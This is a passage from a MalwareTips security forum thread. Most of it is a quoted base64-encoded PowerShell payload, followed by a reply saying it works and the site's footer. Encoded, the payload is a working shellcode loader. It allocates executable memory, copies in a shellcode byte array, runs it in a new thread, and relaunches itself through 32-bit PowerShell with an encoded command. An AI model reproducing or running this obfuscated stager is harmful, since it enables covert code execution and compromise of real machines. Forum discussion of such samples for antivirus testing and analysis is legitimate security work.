DAAeAAzADkALAAwAHgANQBiACwAMAB4ADMAMgAsADAAeABmADcALAAwAHgAOQAzACwAMAB4AGUAYgAsADAAeAA5ADkALAAwAHgANQAxACwAMAB4ADUAZgAsADAAeAA1AGQALAAwAHgAZAAxACwAMAB4ADYAZQAsADAAeAA3ADIALAAwAHgAMwAzACwAMAB4ADUAYQAsADAAeABmADIALAAwAHgAYwAzACwAMAB4AGMAYgAsADAAeAAwAGMALAAwAHgAOQBjACwAMAB4ADgAYwAsADAAeAA0ADIALAAwAHgAMwAzACwAMAB4ADkAYQAsADAAeABjAGMALAAwAHgAOAAwACwAMAB4AGMAMgAsADAAeABlADUALAAwAHgANgAwACwAMAB4ADQAMwAsADAAeABkADQALAAwAHgAZQBiACwAMAB4AGUANgAsADAAeAAxADcALAAwAHgAOAA3ACwAMAB4AGIAOAAsADAAeABiADUALAAwAHgANAAwACwAMAB4ADcANAAsADAAeAA2ADkALAAwAHgANQAyACwAMAB4ADgANAAsADAAeAAyAGYALAAwAHgAYgBiACwAMAB4ADkAOQAsADAAeABhADUALAAwAHgAMQBhACwAMAB4ADUANQAsADAAeABiADcALAAwAHgANQAzACwAMAB4AGYAYgAsADAAeAAwADkALAAwAHgAMQBiACwAMAB4ADMANwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYAMwAsADAAeAA5AGEALAAwAHgANQAwACwAMAB4ADEAYwAsADAAeAA3AGYALAAwAHgAMQBhACwAMAB4ADgAOQAsADAAeAA5ADkALAAwAHgAYgBmACwAMAB4ADkAMQAsADAAeAAyADcALAAwAHgAYwBhACwAMAB4AGIANwAsADAAeAA0ADkALAAwAHgANAA3ACwAMAB4ADAAYQAsADAAeABhADAALAAwAHgAMgA5ACwAMAB4AGIANwAsADAAeAAzAGYALAAwAHgAZAAwACwAMAB4ADQAZAAsADAAeABlADIALAAwAHgAMABmACwAMAB4ADYANQAsADAAeAA1ADMALAAwAHgANgA0ACwAMAB4ADYAMAAsADAAeAAzADAALAAwAHgAMwAxACwAMAB4ADIAMgAsADAAeAA3AGYALAAwAHgAZQBlACwAMAB4ADUAYwAsADAAeAA4AGEALAAwAHgAMQA3ACwAMAB4ADEAMQAsADAAeABiADEALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeAA3ADkALAAwAHgAYgAxACwAMAB4ADAAYQAsADAAeABhADgALAAwAHgANwA5ACwAMAB4AGUAMgAsADAAeAA2ADIALAAwAHgANwAwACwAMAB4AGQAZQAsADAAeAA1ADcALAAwAHgAOQA3ACwAMAB4ADcAZgAsADAAeABjAGIALAAwAHgAYwBiACwAMAB4ADAANAAsADAAeABkADMALAAwAHgANwBkACwAMAB4ADAAYwAsADAAeABmAGQALAAwAHgAYgBiACwAMAB4ADcAZAAsADAAeABmADMALAAwAHgAMAAxACwAMAB4ADMAYwAsADAAeAAyAGQALAAwAHgAYQA1ACwAMAB4ADYAOQAsADAAeAAyAGUALAAwAHgANAA3ACwAMAB4AGMAMAAsADAAeAA4AGIALAAwAHgAYgAxACwAMAB4AGIAMgAsADAAeAA1ADYALAAwAHgAOABiACwAMAB4ADMAYQAsADAAeABmADAALAAwAHgAZAAyACwAMAB4ADAAYwAsADAAeABjADIALAAwAHgAYwA5ACwAMAB4ADYAMAAsADAAeABkADIALAAwAHgAYgAxACwAMAB4ADIAOAAsADAAeAAzADIALAAwAHgAMQAxACwAMAB4ADYANgAsADAAeAA1AGIALAAwAHgAYgBlACwAMAB4ADYAYQAsADAAeAA2ADYALAAwAHgANgA0ACwAMAB4ADcAMAAsADAAeABhADMALAAwAHgAYQBiACwAMAB4AGIANQAsADAAeAA0ADIALAAwAHgAZgBkACwAMAB4AGUANQAsADAAeABmADkALAAwAHgAOABhACwAMAB4ADMAMAAsADAAeABjAGUALAAwAHgAYwBiACwAMAB4AGQAMgAiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABnAEkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGcASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAZwBJACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAUwBzACkAKQA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABBAFoAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAQQBaACAALQBlAGMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBjACAAJABlACIAOwB9AA=='"
Click to expand...
WoW thanks. It works.
 
  • Like
Reactions: JB007 and Andrew3000

Similar threads

TuxTalk
    • Like
New Update GDATA - Update strongly recommended
Replies
9
Views
1,592
Other security for Windows, Mac, Linux
TuxTalk
TuxTalk
Adrian Ścibor
    • Like
    • Applause
    • +Reputation
AVLab.pl Threat landscape and the results of protection based on telemetry data of malware in the wild (March 2023)
Replies
13
Views
2,026
Security Statistics and Reports
Muddy7
M
Gandalf_The_Grey
    • Like
    • +Reputation
AV-Comparatives Business Security Test March-April 2023 – Factsheet
Replies
1
Views
981
Security Statistics and Reports
Trident
Trident

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top